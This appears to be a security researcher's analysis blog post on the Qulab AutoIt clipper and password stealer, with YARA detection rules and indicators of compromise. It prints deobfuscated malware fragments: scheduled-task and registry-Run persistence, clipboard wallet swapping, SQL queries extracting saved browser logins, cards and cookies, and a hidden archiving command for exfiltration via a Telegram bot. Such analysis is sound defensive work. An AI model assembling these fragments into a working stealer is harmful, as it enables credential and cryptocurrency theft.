โโ โโ rule AutoIt { meta: author = "_pusher_" date = "2016-07" description = "www.autoitscript.com/site/autoit/" strings: $aa0 = "AutoIt has detected the stack has become corrupt.\n\nStack corruption typically occurs when either the wrong calling convention is used or when the function is called with the wrong number of arguments.\n\nAutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention." wide ascii nocase $aa1 = "AutoIt Error" wide ascii nocase $aa2 = "Missing right bracket ')' in expression." wide ascii nocase $aa3 = "Missing operator in expression." wide ascii nocase $aa4 = "Unbalanced brackets in expression." wide ascii nocase $aa5 = "Error parsing function call." wide ascii nocase $aa6 = ">>>AUTOIT NO CMDEXECUTE<<<" wide ascii nocase $aa7 = "#requireadmin" wide ascii nocase $aa8 = "#OnAutoItStartRegister" wide ascii nocase $aa9 = "#notrayicon" wide ascii nocase $aa10 = "Cannot parse #include" wide ascii nocase condition: 5 of ($aa*) } โโ โโ
On my side, I will not explain the steps or tools to extract the code, they are plenty of tutorials on the internet for explaining how itโs possible to extract some AutoIt scripts. The idea here is to focus mainly on the malware, not on the extracting partโฆ
Code Obfuscation
After extracting the code from the PE, itโs easy to guess that some amazing stuff is coming to our eyes by just looking the amount of codeโฆ The analysis of this malware will be some kind of challenge.
โโ โโ cat Qulab.au3 | wc -l 21952 // some pain incomming โโ โโ
The source code is really (really) obfuscated but not hard to clean it. it takes just quite some times with the help of homemade scripts to surpass it. But as an analyst that wants to have information, a simple dump of the process during the execution and the report a sandbox is sufficient to understand the main tasks.
For non-technical people, I have created a dedicated page on GitHub for being able to read and learn easily the AutoIT fundamentals. I highly recommend to open it during the reading of this article, it will be easier. you had also to read the official AutoIT FAQ for understanding the API. Unfortunately, itโs not complete as the Microsoft MSDN documentation but itโs enough about the basic principles of this languageโฆ
Itโs impossible to explain all form of obfuscation in this malware, but this is a summary of the main tricks.
- Variable & Function Naming convention
All variables except few exceptions are in that form
โโ โโ \$A\d[A-F0-9]{3,10} โโ โโ
Itโs wonderful to see over ten thousand (and more) variables like this into the whole script (sarcasm)
โโ โโ $A18A4000F15 $A5AA4204E10 $A0FA4403A33 $A55A4601801 $A24A4804C5C ... โโ โโ
- Garbage conditions
When there is an obfuscated code, there is obviously a huge amount of nonsense conditions or unused functions. It doesnโt take a long time to get the idea on Qulab because they are easily catchable by pure logic, take an example on this one :
โโ โโ FUNC A5D10600720(BYREF $A37E6C01A00,$A183A702F3C) IF NOT ISDECLARED("SSA5D10600720") THEN ENDIF ... ... ENDFUNC โโ โโ
This a classical pattern, the condition is just checking if a variable (โSSโ + Function Name) is not declared, inside there is always some local variables that are initiated for purposes of the functions and most of the time they are coming from the master array. By deobfuscating them, the whole conditions on this pattern can be removed variables are switched by their corresponding values, it permits to delete a lot of codes.
- Unused Functions
Another classy scheme is to find some unused functions, and this permit to clean effectively thousands of lines of junk code by creating a script for the purposes or using some User-defined functions made by the AutoIT community.
- Initiating Variables and using them
โโ โโ GLOBAL LOCAL $VARIABLE_1 = FUNC1(ARRAY[POS]) ...Code.... GLOBAL LOCAL $VARIABLE_455 = $VARIABLE_1 ...Code... GLOBAL LOCAL $VARIABLE_9331 = VARIABLE_455 <- Final Value โโ โโ
> Initiating them by a condition
โโ โโ IF $A4A7AC0550A=DEFAULT THEN $A4A7AC0550A=-NUMBER($A198A005329) IF $A2F7AD03E54=DEFAULT THEN $A2F7AD03E54=-NUMBER($A2C8A10261F) IF $A3D7AE0071E=DEFAULT THEN $A3D7AE0071E=-NUMBER($A218A202B4D) IF $A3F7AF01354=DEFAULT THEN $A3F7AF01354=-NUMBER($A2A8A300E5F) โโ โโ
> Using count variable into a 2D Array, with a value that is stored inside a 20 000 length array.
โโย โโ $A31E5E11A1F[NUMBER($A2646512725)][NUMBER($A0C46615D39)]+=NUMBER($A5246713208) โโ โโ
> Hiding code error integers by a mixture of multiple functions and variables.
โโ โโ RETURN SETERROR($A2C07504A0A,NUMBER($A411740414D),NUMBER($A6017502D45)) โโ โโ
Code Execution
This malware has an unorthodox way to execute code and itโs pretty cool.
- Read the directives, follow them to go to the main function
- The main function will set up the master array (I will explain this later)
- When this function is done, the script will go again to the beginning by a purely logical way after the directives, and search for Global variables and instructions, for our case, it will be some global variables.
- When all of the Global Variables have been initiated, it will skip all the functions because they are simply not called (for the moment), and will try to reach some exploitable instruction (as I explained above).
When finally some code is reachable, a domino effect occurs, an initiated variable will call one function, that inside it will call one or multiple functions, and so on. - During the same process, there is also some encoded files that are hardcoded into the code and injected into the code for some specific tasks. When every setup tasks are done, itโs entering into an infinite loop for specific purposes.
In the end, it could be schematized like this.
Directives are leading the road path
Everything that is starting with โ#โ is a directive, this is technically the first thing that the script will check, and here, itโs configured to go to a specific function at all cost that is โA5300003647_โ, this one is the main function.
โโ โโ #ะกะชะะะะกะฌ ะะขะกะฎะะะ ะะฃะะ ะขะซ ะกะกะะะะฏ ะะะฏะฅะ ะะฃะฅะ #NoTrayIcon #OnAutoItStartRegister "A5300003647_" โโ โโ
#NoTrayIcon โ Hide the AutoIT icon on the tray task
#OnAutoItStartRegister โ The first function that will be called at the beginning of the script (an equivalent of the main function)
The Main function is VIP
The first function of Qulab is critical because this is where almost all the data is initialized for the tasks. The variable $DLIT is storing a โhugeโ string that will be split with the delimiter โo2B2Ctโ and stored into the array $OS
Note: the name mentioned here is the one that will be used for this stealer script, results may vary between samples but the idea remains the same.
โโ โโ FUNC A5300003647_() FOR $AX0X0XA=1 TO 5 LOCAL $DLIT="203020o2B2Ct203120o..." GLOBAL $A5300003647,$OS=STRINGSPLIT($DLIT,"o2B2Ct",1) IF ISARRAY($OS) AND $OS[0]>=19965 THEN EXITLOOP SLEEP(10) NEXT ENDFUNC โโ โโ
Global Variables are the keys
Global Variables are certainly the main focus of Qulab, they are nowhere and everywhere, they are so impactful with the master array that a single modification of one Variable can have a domino effect for the whole malware that could end to a segmentation fault or anything else that could crash the script.
When a variable is initialized, there are multiple steps behind it :
- Selecting a specific value from the master array
- Converting the value to a string
- Profit
โโ โโ GLOBAL $A1D7450311E=A5300003647($OS[1]) โโ โโ
the function โA5300003647โ is, in fact, an equivalent of โFrom Hexโ feature, and itโs converting 2 bytes by 2 bytes the values.
โโ โโ FUNC A5300003647($A5300003647) LOCAL $A5300003647_ FOR $X=1 TO STRINGLEN($A5300003647) STEP 2 $A5300003647_&=CHR(DEC(STRINGMID($A5300003647,$X,2))) NEXT RETURN $A5300003647_ ENDFUNC โโ โโ
By just tweaking the instructions of the AutoIT scripts, with the help of some adjustments (thanks homemade deobfuscate scripts and patience), variables are now almost fully readable.
After modifying our 19966 variables (thatโs a lot), we can see clearly most of the tasks that the malware has on the pipe statically. this doesnโt mean that is done with this part, Itโs only a first draft and it needs to be cleaned again because there is a lot of unfinished tasks and of course as I explained above, most of them are unused.
Main code
After all that mess to understand what is the correct path to read the code, the script is now entering into the core step, Theย more serious business begins right now.
To summarize all the task, this is briefly whatโs going on :
- Setting up, Variables that are configured in the builder
- Name of the payload
- Name of the schedule task
- Name of the schedule task folder
- name of the hidden AppData folder where the malware will do the tasks
- Wallets
- Hide itself
- Do all the stealing tasks
- Decoding & load dependances when itโs required
- Make the persistence
- And moreโฆ
Where is the exit?
Between two functions there is sometimes global variables that declared or there are also sneaky calls that have an impact into the payload itself. They could not be really seen at a first view, because they are drowned into an amount of code. So 1 or 2 lines between dozens of functions could be easily forgettable.
we can see that is also indicating the specific method that will be called at the end of everything.
โโ โโ ONAUTOITEXITREGISTER("A1AA3F04218") โโ โโ
So with just small research, we can see our function that will be called at the end of the script between a huge amount of spaghetti code.
Its in fact, closingย crypt32.dllย module, thats is used for the CryptoAPI.
โโ โโ GLOBAL $A1A48943E37=DLLOPEN("crypt32.dll") โโ โโ
Some curiosities to disclose
Homemade functions or already made?
For most of the tasks, the malware is using a lot of โUser Defined Functionsโ (UDF) with some tweaks, as explained on the AutoIT FAQ: โThese libraries have been written to allow easy integration into your own scripts and are a very valuable resource for any programmerโ. it confirms more and more that open-source code and programming forums are useful for both sides (good & bad), so for developing malware it doesnโt require to be a wizard, everything is at disposition and free.
Also for Qulab, itโs confirmed that he used tweaked or original UDF for :
- SQL content
- Archiving content
- Telegram API
- Windows API
- Memory usage
Memory optimization
AutoIT programs are known to be greedy in memory consumption and could be probably a risk to be more detectable. At multiple time, the malware will do a task to check if there is a possibility to reduce the amount of allocated memory, by removing as much as possible, pages from the working set of the process. The manipulation required to useย EmptyWorkingSetย and could permit to reduce by half the memory usage of the program.
โโ โโ FUNC A0E64003F0C($A1B85D1000C=0) IF NOT $A1B85D1000C THEN $A1B85D1000C=EXECUTE(" @AutoItPID ") LOCAL $A3485F11D1D=DLLCALL("kernel32.dll","handle","OpenProcess","dword",(($A209DF54B2B<1536)?1280:4352),"bool",0"dword",$A1B85D1000C) IF @ERROR OR NOT $A3485F11D1D[0] THEN RETURN SETERROR(@ERROR+20,@EXTENDED,0) LOCAL $A5F55F1392E=DLLCALL(EXECUTE(" @SystemDir ")&"\psapi.dll","bool","EmptyWorkingSet","handle",$A3485F11D1D[0]) RETURN 1 ENDFUNC โโ โโ
First, it will grab the PID value of the AutoIT-compiled program by executing the macro @AutoItPID, then opening it with OpenProcess. But one of the argument is quite obscure
ย (($A209DF54B2B<1536)?1280:4352) โโ โโ
what is behind variable $A209DF54B2B? letโs dig into itโฆ
โโ ย โโ GLOBAL CONST $A209DF54B2B=A2054F01A5F() FUNC A2054F01A5F() LOCAL $A1656715F1D=DLLSTRUCTCREATE("struct;dword OSVersionInfoSize;dword MajorVersion;dword MinorVersion;dword BuildNumber;dword PlatformId;wchar CSDVersion[128];endstruct") DLLSTRUCTSETDATA($A1656715F1D,1,DLLSTRUCTGETSIZE($A1656715F1D)) LOCAL $A5F55F1392E=DLLCALL("kernel32.dll","bool","GetVersionExW","struct*",$A1656715F1D) IF @ERROR ORNOT$A5F55F1392E[0] THENRETURNSETERROR(@ERROR,@EXTENDED,0) RETURN BITOR(BITSHIFT(DLLSTRUCTGETDATA($A1656715F1D,2),-8),DLLSTRUCTGETDATA($A1656715F1D,3))) ENDFUNC โโ โโ
This is WinAPI function will retrieve the version of the current operating system used on the machine, the value returned is into a binary format. So if we look back and check with the official API.
โโ โโ // // _WIN32_WINNT version constants // โโ #define _WIN32_WINNT_NT4 0x0400 // Windows NT 4.0 #define _WIN32_WINNT_WIN2K 0x0500 // Windows 2000 #define _WIN32_WINNT_WINXP 0x0501 // Windows XP #define _WIN32_WINNT_WS03 0x0502 // Windows Server 2003 #define _WIN32_WINNT_WIN6 0x0600 // Windows Vista #define _WIN32_WINNT_VISTA 0x0600 // Windows Vista #define _WIN32_WINNT_WS08 0x0600 // Windows Server 2008 #define _WIN32_WINNT_LONGHORN 0x0600 // Windows Vista #define _WIN32_WINNT_WIN7 0x0601 // Windows 7 #define _WIN32_WINNT_WIN8 0x0602 // Windows 8 #define _WIN32_WINNT_WINBLUE 0x0603 // Windows 8.1 #define _WIN32_WINNT_WINTHRESHOLD 0x0A00 // Windows 10 #define _WIN32_WINNT_WIN10 0x0A00 // Windows 10 โโ โโ
With knowing the Windows Version with this function, the AutoIT script is now able to open the process correctly and analyzing it. The last task is to purge the unused working set by calling EmptyWorkingSet for cleaning some unnecessary memory.
Task scheduling
Task scheduling with stealers is summarized with one line of code, a simple and effective ShellExecute command with schtask.exe to execute periodically something, as a persistence trick. Here itโs a little bit more advanced than usual, in multiple points by using a TaskService Object
โโ โโ $A60FD553516=OBJCREATE("Schedule.Service") $A60FD553516.Connect() โโ โโ
The new task is set with a flag value of 0, as explained in the MSDN Documentation, itโs a mandatory value.
โโย โโ $A489E853A1E=$A60FD553516.NewTask(0) โโ โโ
To be less detectable, some tricks as being done to look like legit as possible by detailing that the process has been made by the correct user, the description, the name of the task and the task folder is adjusted by what the customer wants.
โโ โโ $A4A9E951E11=$A489E853A1E.RegistrationInfo() $A4A9E951E11.Description()= $A487E851D38 $A4A9E951E11.Author()=EXECUTE(" @LogonDomain ")&"\"&EXECUTE(" @UserName ") โโ โโ
After some other required values to be configured that is not really necessary to talk, itโs way more interesting to talk about the setting part of this Task Service because it is quite interesting.
To maximize the yield, Qulab tweaks the service whenever the situation :
- The laptop is not on charge
- The battery is low
- Network available or not
In the end, every minute, the task manager will run the task by executing the malware into the hidden repository folder in %APPDATA%.
โโ โโ $A4B9EA50562=$A489E853A1E.Settings() $A4B9EA50562.MultipleInstances() = 0 $A4B9EA50562.DisallowStartIfOnBatteries()= FALSE $A4B9EA50562.StopIfGoingOnBatteries()= FALSE $A4B9EA50562.AllowHardTerminate()= TRUE $A4B9EA50562.StartWhenAvailable()= TRUE $A4B9EA50562.RunOnlyIfNetworkAvailable() FALSE $A4B9EA50562.Enabled()= TRUE $A4B9EA50562.Hidden()= TRUE $A4B9EA50562.RunOnlyIfIdle()= FALSE $A4B9EA50562.WakeToRun()= TRUE $A4B9EA50562.ExecutionTimeLimit()= "PT1M" // Default PT99999H $A4B9EA50562.Priority()= 3 // Default 5 $A3E9EB51B0D=$A489E853A1E.Principal() $A3E9EB51B0D.Id()=EXECUTE(" @UserName ") $A3E9EB51B0D.DisplayName()=EXECUTE(" @UserName ") $A3E9EB51B0D.LogonType()=$A0B8E352D04 $A3E9EB51B0D.RunLevel()= 0 โโ โโ
Another Persistence?
A classic one is used
IF NOT A3F64500C0D($A00DEB51215,$A35DEF51B61) THEN REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", $A00DEB51215,"REG_SZ",""""&$A104A053309&"\"&$A60DE955B5F&"""")
There is nothing much to say more, about this partโฆ
Encoding is not encryption
When I was digging into the code, I found a mistake that makes me laugh a littleโฆ The classical quote for saying that base64 is encryption. So maybe after this in-depth analysis, the malware developer will fix his mistake (or just insulting me :โ) )
Malware Features
Clipper
If you are unfamiliar with what is a clipper, itโs in fact really simpleโฆ The idea is to alter something that is in the clipboard content with the help of some filters/rules that is most of the cases simplify as regular expressions. If it matches with something, it will modify the amount of data caught with something else that was configured. Itโs heavily used for swapping crypto wallet IDs from the victim to the attacker one. This is also the case with Qulab, itโs focusing on Wallets & Steam trade links.
This piece of code represent the core of the clipper :
So that are the steps:
- Execute a script for checking if there any new data to send for the attacker
- Checking if the ongoing task is present on the task scheduler.
- Cleaning unnecessary Working Set (see the memory optimization explained above)
- Make a pause in the loop for 200 ms
- Get the content of the clipboard with CLIPGET
- Check all the wallet, if it matches, substitute with the wished value.
- Put the modified content on the Clipboard with CLIPPUT
- Repeat
All the values from the different wallet that the attacker wants to swap are stored at the beginning of the code section. By pure speculations, Iโm considering that are the values that are configured in the builder.
Current List of Cryptocurrency Wallet that the stealer is switching.
Bitcoin | Bitcoin Cash | Bitcoin Gold | Bytecoin |
Cardano | Lisk | Dash | Doge |
Electronium | Ethereum | Graft | Litecoin |
Monero | Neo | QIWI | Qtum |
Steam Trade Link | Stratis | VIA | WME |
WMR | WMU | WMX | WMZ |
Waves | Yandex Money | ZCash |
Browser Stealer
Qulab is some kind of a puzzle with multiple pieces and each piece is also another puzzle. Collectings and sorting them to solve the entire fresco is some kind of a challenge. I can admit for the browser part, even if the concept is easy and will remain always the same (for the fundamentals of a Password Stealer), the way that it was implemented is somewhat clever.
At first, every browser that is supported by the malware is checked in turn, with specific arguments :
- The Browser path
- The files that the stealer wants to grab with โ|โ as a delimiter
- The Name of the browser
It goes to a very important function that will search (not only for the browser), these kinds of files :
- wallet.dat
- Login Data
- formhistory.sqlite
- Web Data
- cookies.sqlite
- Cookies
- .maFile
If they are matching, it enters into a loop that will save the path entry and storing it into one master variable with โ|โ as a delimiter for every important file.
When all the files are found, it only needs to do some regular expression to filter and split the data that the malware and to grab.
After inspecting and storing data from browsers that are present in the list, serious business is now on the pipeโฆย One of the binaries that are hardcoded in base64 is finally decoded and used to get some juicy data and like every time itโs the popular SQLite3.dll that was inside all of this.
Something interesting to notice is that the developer made some adjustment with the official AutoIT FUD For SQLite3 and removed all the network tasks, for avoiding downloading the libraries (32 or 64 bits) and of course be less detectable.
The file is saved into the %ROAMING% directory, and will have the name :
- PE_Name + โ.sqlite3.module.dllโ
The routine remains the same for each time this library is required :
- Checking with a patchedย _SQLite_GetTable2d, the SQL Statement that needs to be executed & tested is a valid one.
- The SQL Table is put into a loop and each iteration of the array is verified by a specific regular expression.
- If the content is found, it enters into another condition that will simply add them into the list of files & information that will be pushed in the malicious archive.
In the end, these requests are executed on browser files.
ย SELECT card_number_encrypted, name_on_card, expiration_month, expiration_year FROM credit_cards; SELECT username_value, password_value, origin_url, action_url FROM logins; select host, 'FALSE' as flag, path, case when isSecure = 1 then 'TRUE' else 'FALSE' end as secure, expiry, name, value from moz_cookies; select host_key, 'FALSE' as flag, path, case when is_secure = 1 then 'TRUE' else 'FALSE' end as secure, expires_utc, name, encrypted_value from cookies; โโย โโย
Current List of supported browsers
360 Browser | Amigo | AVAST Browser | Blisk | Breaker Browser |
Chromium | Chromodo | CocCoc | CometNetwork Browser | Comodo Dragon |
CyberFox | Flock Browser | Ghost Browser | Google Chrome | IceCat |
IceDragon | K-Meleon Browser | Mozilla Firefox | NETGATE Browser | Opera |
Orbitum Browser | Pale Moon | QIP Surf | SeaMonkey | Torch |
UCBrowser | uCOZ Media | Vivaldi | Waterfox | Yandex Browser |
FTP
The FTP is rudimentary but is doing the task, as far than it looks, itโs only targeting FileZilla software.
Grabber
Qulab doesnโt have an advanced Grabber feature, itโs really simplistic compared to stealers like Vidar. It simplifies by just one simple lineโฆ Itโs using the same function as explained above with the browsers, with the only difference, itโs focusing on searching specific file format on the desktop directory
Targeted files are
- .txt
- .maFile
- wallet.dat
Wallet
Nothing to say more than Exodus is mainly targeted.
Discord
Discord is more and more popular nowadays, so itโs daily routine now to see this software targeted by almost all the current password-stealer on the market.
Steam & Steam Desktop Authenticator
The routine for Steam is almost identical to the one that I explained in Predator and will remain the same until Steam will change some stuff into the security of his files (or just changing the convention name of them).
- Finding the Steam path into the registry
- searching the config folder
- searching recursively into it for grabbing all the ssfn files
But! There is something different on this Password-stealer than all the other that Iโve seen currently. Its also targeting Steam Desktop Authenticator a Third-party software as explained on the official page as aย desktop implementation of Steamโs mobile authenticator app. Itโs searching for a specific and unique file โ.maFileโ, itโs already mentioned above in the Grabber part and The Browser Stealing part. This file contains sensitive data of the steam account linked with the Steam mobile authenticator app.
So this malware is heavily targeting Steam :
- Clipping Steam Trade Links
- Stealing steam sessions
- Stealing 2FA main file from a Third-Party software.
Information log
Itโs a common thing with stealer to have an information file that logs important data from the victimโs machine. Itโs also the case on Qulab, itโs not necessary to explain all the part, Iโm just explaining here simply with which command it was able to do get the pieces of information.
OS Version | @OSVersion |
OS Architecture | @OSArch |
OS Build | @OSBuild |
Username | @UserName |
Computer Name | @ComputerName |
Processor | ExecQuery(โSELECT * FROM Win32_VideoControllerโ,โWQLโ,16+32) |
Video Card | ExecQuery(โSELECT * FROM Win32_Processorโ,โWQLโ,16+32) |
Memory | STRINGFORMAT(โ%.2f Gbโ,MEMGETSTATS()[1]/1024/1024) |
Keyboard Layout ID | @KBLayout |
Resolution | @DesktopWidth & @DesktopHeight & @DesktopDepth & @DesktopRefresh |
- Network
Not seen due to the proxy, there is a network request done on ipapi.co for getting all the network information of the victimโs machine.
โโ $A4AC5512B62=INETREAD("https://ipapi.co/json",3) โโ
The JSON result is consolidated into one variable and saved for the final log file.
โโ โโ IF STRINGLEN($A4AC5512B62) > 75 THEN $A2B1F55481F=A4604603206(BINARYTOSTRING($A4AC5512B62)) $A280FD53C4B =" - IP: " &A211460135A($A2B1F55481F,"[ip]") & EXECUTE(" @CRLF ") &" - Country: " &A211460135A($A2B1F55481F,"[country_name]") & EXECUTE(" @CRLF ") &" - City: " &A211460135A($A2B1F55481F,"[city]") & EXECUTE(" @CRLF ") &" - Region: " &A211460135A($A2B1F55481F,"[region]") & EXECUTE(" @CRLF ") &" - ZipCode: " &A211460135A($A2B1F55481F,"[postal]") & EXECUTE(" @CRLF ") &" - ISP: " &A211460135A($A2B1F55481F,"[org]") & EXECUTE(" @CRLF ") &" - Coordinates: " &A211460135A($A2B1F55481F,"[latitude]")&", "&A211460135A($A2B1F55481F,"[longitude]")&EXECUTE(" @CRLF ") &" - UTC: " &A211460135A($A2B1F55481F,"[utc_offset]")&" ("&A211460135A($A2B1F55481F,"[timezone]")&")" ENDIF โโ โโ
- Softs
$A12EF151C00=A5944E0550E("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall","","DisplayName") FOR $A51E7205400 = 1 TO $A12EF151C00[0][0] $A3B1F954B63 &=" - "&$A12EF151C00[$A51E7205400][0]&EXECUTE(" @CRLF ") NEXT
- Process List
Because AutoIT is based for doing automation task script, almost all the basic commands from the WinAPI are already integrated, so by simply using the ProcessList() call, the list of all the processes are stored into an array.
$A2EEFA54E30=PROCESSLIST() FOR $A51E7205400=1 TO $A2EEFA54E30[0][0] $A481FB54A60&=" - "&$A2EEFA54E30[$A51E7205400][0]&" / PID: "&$A2EEFA54E30[$A51E7205400][1]&EXECUTE(" @CRLF ") NEXT โโ
By mixing all this data, the log file is finally done:
# /===============================\ # |=== QULAB CLIPPER + STEALER ===| # |===============================| # |==== BUY CLIPPER + STEALER ====| # |=== http://teleg.run/QulabZ ===| # \===============================/ Date: XX.XX.2019, HH:MM:SS Main Information: - ... Other Information: - ... Soft / Windows Components / Windows Updates: - ... Process List: - ...
Instructions log
For probably helping his customers when the malware is catching data from specific software other than browsers, an additional file is added to give some explanations to fulfill the task entirely after the stealing process, step by step and stores into โะะฝััััะบัะธั ะฟะพย ัััะฐะฝะพะฒะบะต.txtโ
Instructions are unique for each of these :
- Exodus
- Discord
- Wallets
- Steam
- Filezilla
- Telegram
- Steam Desktop Authentication
- Grabber part
Archive Setup

โโ โโ ARCHIVATE($A271F153721) RUNWAIT($A271F153721&" a -y -mx9 -ssw """&$A104A053309&"\"&$A63CEC52907&".7z"" """&$A104A053309&"\1\*""","",EXECUTE(" @SW_HIDE ")) FILEDELETE($A271F153721) โโ โโ
a | Add |
y | yes on all queries |
mx9 | Ultra Compression Method |
ssw | Compress files open for writing |
In the end, this is an example of a final archive file.
But there is a possibility to have all these files & folders:
โโ โโ \1\Passwords.txt \1\Information.txt \1\Screen.jpg \1\AutoFills.txt \1\CreditCards.txt \1\Cookies \1\Desktop TXT Files \1\Discord \1\Telegram \1\Steam \1\Exodus \1\Wallets \1\FileZilla \1\SDA โโ โโ
Cleaning process
Simple and effective:
- Killing the process
- Deleting the script directory
Itโs easily catchable on the monitoring logs.
Telegram Bot as C2?
This malware is using a Telegram bot for communicating & alerting when data have been stolen. As usual, itโs using some UDF functions, so there is nothing really new. Itโs not really complicated to understand how itโs working.
When a bot is created, there is a unique authentication token that could be used after for making requests to it.
api.telegram.org/bot/
Also, itโs using a private proxy when itโs sending the request to the bot :
These values are used to configure the proxy setting during the HTTP request :
How it looks like on the other side?
This malware is developed by Qulab, and it took seconds to find the official sale post his stealer/clipper. As usual, every marketing that you want to know about it is detailed.
- This stealer/clipper is sold 2000 rubles (~30$)
- ย Support is possible
Letโs do some funny stuff
I made some really funny unexpected content by modifying some instructions to make something that is totally unrelated at all. Somewhat, patching malware could be really entertaining and interesting!
Note: If you havenโt seen the anime โKonosubaโ, you will not understand at all, whatโs going on :p
Additional Data
IoC
Hashes
- a915fc346ed7e984e794aa9e0d497137
- 887fac71dc7e038bc73dc9362585bf70
- a915fc346ed7e984e794aa9e0d497137
IP
-
185.142.97.228
Proxy Port
-
65233
Schedule Task
- %PAYLOAD_NAME%
- Random Description
Folders & Files
- %APPDATA%/%RANDOM_FOLDER%/
- %APPDATA%/%RANDOM_FOLDER%/1/
- %PAYLOAD_NAME%.module.exe (7zip)
- %PAYLOAD_NAME%.sqlite.module.exe (sqlite3.dll)
Threat Actor
MITRE ATT&CK
- Discovery โ System Information Discovery
- Discovery โ System Time Discovery
- Discovery โ Query Registry
- Discovery โ Process Discovery
- Execution โ Execution through Module Load
- Credential Access โ Credentials in Files
- Collection โ Screen Capture
- Collection โ Data from Local System
- Exfiltration โ Data Compressed
Software & Language used
- AutoIT
- Aut2Exe (Decompiler)
- myAut2Exe (Decompiler)
- CFF Explorer
- x32dbg
- Python
Yara
rule Qulab_Stealer : Qulab { meta: description = "Yara rule for detecting Qulab (In memory only)" author = "Fumik0_" strings: $s1 = "QULAB CLIPPER + STEALER" wide ascii $s2 = "SDA" wide ascii $s3 = "SELECT * FROM Win32_VideoController" wide ascii $s4 = "maFile" wide ascii $s5 = "Exodus" wide ascii condition: all of ($s*) }
Conclusion
Well, itโs cool sometimes to dig into some stuff that is not really common for the language choice (on my point of view for this malware). Itโs entertaining and always worth to learn new content, find new tools, find a new perspective to put your head into some totally unknown fields.
Qulab stealer is interesting just in fact that is using AutoIT and abusing a telegram bot for sharing some data but stealing & clipper features remain the same as all the other stealers. The other thing that, itโs confirming also that more and more people are using User Defined Functions/Libraries free to use to do good or bad things, this trends will be more and more common in those days, developers or simple users with lack of skills is now just doing some google research and will be able to make a software or a malware, without knowing anything in depth about what the code is doing, when the task is done, nothing else matters at the end.
But I admit, I really take pleasure to patch it for stupid & totally useless stuff
Now itโs time for a break.
#HappyHunting
Special thanks: @siri_urz, @hh86_